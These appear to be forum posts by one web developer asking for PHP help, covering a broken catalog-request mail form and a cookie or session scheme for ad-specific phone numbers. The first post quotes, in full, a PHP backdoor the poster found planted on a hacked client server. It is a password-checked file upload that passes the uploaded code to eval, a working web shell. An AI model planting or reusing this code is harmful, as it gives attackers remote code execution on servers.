rhouk

It appears my clients web site files have been hacked. I've started finding odd php files on their server, with no explanation as to how they got there. When I open these files they appear blank until I scroll down and to the center, where I find the following script. Can anyone tell me what this script is doing. <?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?> I know this won't fix the issue, but understanding what they are doing might help. Thanks!!!!

Thanks for you help. I corrected the $_POST issue, and also realized that the single quotes in the $message variable was causing it not to capture the input values. Once I switched to regular quotes it worked properly. Thanks again for your fast response and advise!!!

Can someone take a look at this script I've inherited. For whatever reason it is not working and I can't figure out why. It seems to not be passing the user input values into the mail() function?? You can go to www.francoisandco.com and click on the 2008 Catalog Request banner at top right to try it out. (I promise it won't work and you won't receive a catalog) It isn't receiving an error, so it displays the Thank You page, as if it works, but it doesn't send anything. I have the $message values printing out (in white font) under the "Return" link, so you can highlight this area to see that the mail() function is never receiving the input values. However, it is capturing the input values because I have it displaying your name input in the Thank You message. They tell me it used to work, but I've not done anything to make it stop working. I'm at a loss. Here is the coding. The PHP script and form are all in this php file (which could be the problem, except they say it worked before). I have no idea. Please help!!

I have a dynamically generated website that needs for a phone number (include file) to change depending on which page they entered on. These pages are clones of the index.php page, but seperated into their own folder, so URL can be used in seperate magazine ads and are easily distinguishable. http://www.francoisandco.com/ http://www.francoisandco.com/ad/ http://www.francoisandco.com/elle/ http://www.francoisandco.com/fd/ http://www.francoisandco.com/ch/ etc. Each page will have a unique phone number at the top of the page. Once they enter, through one of these advertised URLs, any link will send them back into the main content area. What I'm trying to accomplish is for the browser to recognize where they entered (....andco.com/ad/ or ....andco.com/elle/) and use that information to tell the main page which phone number to display. Using the following code on the main index.php page accomplishes this, but only on the initial click from the entrance page. if(getenv('HTTP_REFERER') == "http://www.francoisandco.com/ad/") { $phone = "AD"; } if(!isset($phone)) $phone="main"; and using the following in the include file: <img src="/images/phoneNumber-<? echo $phone; ?>.jpg" width="250" height="60" border="0" alt="Call Today!"> And then creating seperate phone number images with associated names (phoneNumber-AD.jpg, phoneNumber-ELLE.jpg, etc.). Anyway, since the refering page changes on the next click, this reverts back to the "main" phone number, but I need the phone number to remain associated with the page they entered on. So I'm thinking Cookies and/or Sessions would be a solution, but have not used them before so not sure how to set this up. Sorry for the drawn out explanation, but thought it might help. Any initial thoughts on using Cookies and/or Sessions to accomplish this? Any threads or tutorials that might help? Many thanks!!